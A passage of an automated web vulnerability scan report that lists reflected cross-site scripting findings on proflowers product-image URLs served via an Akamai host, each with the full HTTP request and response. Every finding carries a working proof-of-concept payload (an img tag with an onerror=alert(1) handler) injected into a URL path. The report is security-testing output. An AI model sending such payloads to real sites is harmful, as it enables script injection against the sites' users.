User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:54 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inhydblu_sqbsktgrn10_PF34857<img src=a onerror=alert(1)>40952913b8
4.119. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inltpnkrosalea_victin10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inltpnkrosalea_victin10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c211e<img%20src%3da%20onerror%3dalert(1)>87d2347cfbd was submitted in the REST URL parameter 9. This input was echoed as c211e<img src=a onerror=alert(1)>87d2347cfbd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inltpnkrosalea_victin10_PFc211e<img%20src%3da%20onerror%3dalert(1)>87d2347cfbd?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:03 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inltpnkrosalea_victin10_PFc211e<img src=a onerror=alert(1)>87d2347cfbd
4.120. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpinkros_ltbskt10_PC0841PB_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpinkros_ltbskt10_PC0841PB_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f0c74<img%20src%3da%20onerror%3dalert(1)>ba3c5695188 was submitted in the REST URL parameter 9. This input was echoed as f0c74<img src=a onerror=alert(1)>ba3c5695188 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpinkros_ltbskt10_PC0841PB_PFf0c74<img%20src%3da%20onerror%3dalert(1)>ba3c5695188?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 110
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:00 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inpinkros_ltbskt10_PC0841PB_PFf0c74<img src=a onerror=alert(1)>ba3c5695188
4.121. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkanthur_sqwht09_l [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkanthur_sqwht09_l

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e53ea<img%20src%3da%20onerror%3dalert(1)>797c7d57c08 was submitted in the REST URL parameter 9. This input was echoed as e53ea<img src=a onerror=alert(1)>797c7d57c08 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkanthur_sqwht09_le53ea<img%20src%3da%20onerror%3dalert(1)>797c7d57c08?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:03 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inpnkanthur_sqwht09_le53ea<img src=a onerror=alert(1)>797c7d57c08
4.122. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkazaleatop_urn08bud_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkazaleatop_urn08bud_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload ec4fd<img%20src%3da%20onerror%3dalert(1)>179007b844c was submitted in the REST URL parameter 9. This input was echoed as ec4fd<img src=a onerror=alert(1)>179007b844c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkazaleatop_urn08bud_PFec4fd<img%20src%3da%20onerror%3dalert(1)>179007b844c?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:04 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inpnkazaleatop_urn08bud_PFec4fd<img src=a onerror=alert(1)>179007b844c
4.123. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkroseblucampanula_victin10_2_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkroseblucampanula_victin10_2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 962c9<img%20src%3da%20onerror%3dalert(1)>9f2e498f529 was submitted in the REST URL parameter 9. This input was echoed as 962c9<img src=a onerror=alert(1)>9f2e498f529 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkroseblucampanula_victin10_2_PF962c9<img%20src%3da%20onerror%3dalert(1)>9f2e498f529?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 115
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:13 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inpnkroseblucampanula_victin10_2_PF962c9<img src=a onerror=alert(1)>9f2e498f529
4.124. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpurpazalea_sqbsktgrn09_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpurpazalea_sqbsktgrn09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 1aae3<img%20src%3da%20onerror%3dalert(1)>6ccde723029 was submitted in the REST URL parameter 9. This input was echoed as 1aae3<img src=a onerror=alert(1)>6ccde723029 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpurpazalea_sqbsktgrn09_PF1aae3<img%20src%3da%20onerror%3dalert(1)>6ccde723029?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:00 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inpurpazalea_sqbsktgrn09_PF1aae3<img src=a onerror=alert(1)>6ccde723029
4.125. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 3be1c<img%20src%3da%20onerror%3dalert(1)>33e58a7dff5 was submitted in the REST URL parameter 9. This input was echoed as 3be1c<img src=a onerror=alert(1)>33e58a7dff5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PF3be1c<img%20src%3da%20onerror%3dalert(1)>33e58a7dff5?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:06 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PF3be1c<img src=a onerror=alert(1)>33e58a7dff5
4.126. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inrosylwurn_victin10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inrosylwurn_victin10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload da54c<img%20src%3da%20onerror%3dalert(1)>2d8a02251de was submitted in the REST URL parameter 9. This input was echoed as da54c<img src=a onerror=alert(1)>2d8a02251de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inrosylwurn_victin10_PFda54c<img%20src%3da%20onerror%3dalert(1)>2d8a02251de?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 103
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:13 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inrosylwurn_victin10_PFda54c<img src=a onerror=alert(1)>2d8a02251de
4.127. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6insucculent_zinc09_l [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6insucculent_zinc09_l

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload fb488<img%20src%3da%20onerror%3dalert(1)>9985bf4a860 was submitted in the REST URL parameter 9. This input was echoed as fb488<img src=a onerror=alert(1)>9985bf4a860 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6insucculent_zinc09_lfb488<img%20src%3da%20onerror%3dalert(1)>9985bf4a860?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:54 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6insucculent_zinc09_lfb488<img src=a onerror=alert(1)>9985bf4a860
4.128. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inwhtazalea_crmurn11_PC1080_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inwhtazalea_crmurn11_PC1080_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 2bf12<img%20src%3da%20onerror%3dalert(1)>307ef96990b was submitted in the REST URL parameter 9. This input was echoed as 2bf12<img src=a onerror=alert(1)>307ef96990b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inwhtazalea_crmurn11_PC1080_PF2bf12<img%20src%3da%20onerror%3dalert(1)>307ef96990b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 110
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:05 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inwhtazalea_crmurn11_PC1080_PF2bf12<img src=a onerror=alert(1)>307ef96990b
4.129. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT8inspath_wdtpr09_l [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT8inspath_wdtpr09_l

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 9953a<img%20src%3da%20onerror%3dalert(1)>0606794631f was submitted in the REST URL parameter 9. This input was echoed as 9953a<img src=a onerror=alert(1)>0606794631f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT8inspath_wdtpr09_l9953a<img%20src%3da%20onerror%3dalert(1)>0606794631f?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 97
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:56 GMT
Connection: close

Unable to find /ProvideCommerce/PLT8inspath_wdtpr09_l9953a<img src=a onerror=alert(1)>0606794631f
4.130. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT_8inwhpot_PC1795_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT_8inwhpot_PC1795_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 93ba9<img%20src%3da%20onerror%3dalert(1)>0ab92364043 was submitted in the REST URL parameter 9. This input was echoed as 93ba9<img src=a onerror=alert(1)>0ab92364043 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT_8inwhpot_PC1795_SQ93ba9<img%20src%3da%20onerror%3dalert(1)>0ab92364043?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Mon, 09 May 2011 12:12:34 GMT
Connection: close

Unable to find /ProvideCommerce/PLT_8inwhpot_PC1795_SQ93ba9<img src=a onerror=alert(1)>0ab92364043
4.131. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTangeltree10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTangeltree10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 6afb8<img%20src%3da%20onerror%3dalert(1)>a4c35050e8d was submitted in the REST URL parameter 9. This input was echoed as 6afb8<img src=a onerror=alert(1)>a4c35050e8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTangeltree10_PF6afb8<img%20src%3da%20onerror%3dalert(1)>a4c35050e8d?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 93
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:58 GMT
Connection: close

Unable to find /ProvideCommerce/PLTangeltree10_PF6afb8<img src=a onerror=alert(1)>a4c35050e8d
4.132. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTazaleabons10_bloom_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTazaleabons10_bloom_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f3028<img%20src%3da%20onerror%3dalert(1)>05cd2cada1f was submitted in the REST URL parameter 9. This input was echoed as f3028<img src=a onerror=alert(1)>05cd2cada1f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTazaleabons10_bloom_PFf3028<img%20src%3da%20onerror%3dalert(1)>05cd2cada1f?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:00 GMT
Connection: close

Unable to find /ProvideCommerce/PLTazaleabons10_bloom_PFf3028<img src=a onerror=alert(1)>05cd2cada1f
4.133. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTgdnabonsai2_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTgdnabonsai2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 9510f<img%20src%3da%20onerror%3dalert(1)>aefbe9bcc3 was submitted in the REST URL parameter 9. This input was echoed as 9510f<img src=a onerror=alert(1)>aefbe9bcc3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTgdnabonsai2_PF9510f<img%20src%3da%20onerror%3dalert(1)>aefbe9bcc3?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 92
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:58 GMT
Connection: close

Unable to find /ProvideCommerce/PLTgdnabonsai2_PF9510f<img src=a onerror=alert(1)>aefbe9bcc3
4.134. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThibiscus_dkbsktyel09_l [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThibiscus_dkbsktyel09_l

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload daa33<img%20src%3da%20onerror%3dalert(1)>f1e0c05c9d7 was submitted in the REST URL parameter 9. This input was echoed as daa33<img src=a onerror=alert(1)>f1e0c05c9d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

